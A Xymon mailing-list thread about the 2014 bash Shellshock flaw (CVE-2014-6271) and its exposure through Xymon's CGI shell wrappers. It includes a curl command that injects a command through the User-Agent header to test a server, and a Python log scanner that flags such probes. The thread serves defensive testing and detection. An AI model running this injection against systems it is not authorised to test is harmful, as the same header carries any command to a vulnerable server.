Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
    your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh
    <html><head><title>Invalid request</title></head>
    <body>Invalid request</body></html>
    your_workstation$

...which creates a file (if you are vulnerable) in your Xymon server '/tmp/':

    your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'
    vulnerable
    your_workstation$

...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message ----- From: "J.C. Cleaver" <cleaver at terabithia.org> To: xymon at xymon.com Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi code (to set the environment properly), which means this would be an avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often /bin/sh on Linux distros) is another workaround. (This is the default on the Terabithia RPMS for EL6.)
More info: http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environmen... https://access.redhat.com/articles/1200223
Regards, -jc
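The vector described in both messages above is an HTTP header carrying a bash exported-function definition into a Xymon CGI wrapper script. As an added example (not from the thread or from Xymon), the following Python flags such requests in a web server "combined" access log so an admin can see whether anyone, including Troy's test, has hit the CGI wrappers; the log lines are constructed samples, and the `history.sh` path in them is assumed for illustration.

```python
import re

# Constructed sample lines in Apache/nginx "combined" log format (not from the
# thread). Line 3 carries the header from Troy's test; line 4 is a second
# constructed probe with the marker in the Referer field; the rest are benign.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2014:12:01:03 -0700] "GET /xymon-cgi/svcstatus.sh?HOST=web1&SERVICE=http HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [24/Sep/2014:12:01:07 -0700] "GET /xymon/ HTTP/1.1" 200 2048 "-" "curl/7.37.0"
198.51.100.7 - - [24/Sep/2014:12:02:15 -0700] "GET /xymon-cgi/svcstatus.sh HTTP/1.1" 400 97 "-" "() { :;}; echo vulnerable>/tmp/test-xymon-shellshock"
198.51.100.7 - - [24/Sep/2014:12:02:16 -0700] "GET /xymon-cgi/history.sh HTTP/1.1" 400 97 "() { :; }; echo test" "curl/7.37.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The exported-function marker that triggers CVE-2014-6271: "() {" with
# optional whitespace. No legitimate client sends this in a header.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def find_shellshock(log_text):
    """Return (ip, path, field) for each request whose Referer or User-Agent
    carries the Shellshock function-definition marker."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), m.group("path"), field))
    return hits

def targets_shell_cgi(path):
    """True when the path is a Xymon CGI wrapper (the shell scripts JC
    describes), i.e. where an exported-function payload would execute."""
    return path.startswith("/xymon-cgi/") and path.split("?")[0].endswith(".sh")

if __name__ == "__main__":
    for ip, path, field in find_shellshock(SAMPLE_LOG):
        tag = "CGI wrapper hit" if targets_shell_cgi(path) else "other path"
        print(f"{ip} {path} ({field}): {tag}")
```

A 400 "Invalid request" response, as in Troy's transcript, does not mean the payload failed: the wrapper already ran the header before the C CGI rejected the request, so every hit on a wrapper path should be checked against the patch status of that host.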
Xymon mailing list Xymon at xymon.com http://lists.xymon.com/mailman/listinfo/xymon